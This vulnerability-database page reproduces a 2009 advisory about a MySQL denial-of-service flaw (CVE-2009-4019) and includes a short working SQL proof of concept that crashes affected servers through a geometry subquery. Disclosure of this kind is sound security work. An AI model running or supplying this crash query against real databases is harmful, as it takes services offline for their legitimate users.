Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-4019

Publish Date: 23 Nov 2009

                							

                source: http://www.securityfocus.com/bid/37297/info
 
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
 
An attacker can exploit these issues to crash the application, denying access to legitimate users.
 
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 

drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values 
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where 
`c0` &lt;&gt;  (select geometrycollectionfromwkb(`c3`) from `t1`);

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service

Vulmon Search

About

Products

Connect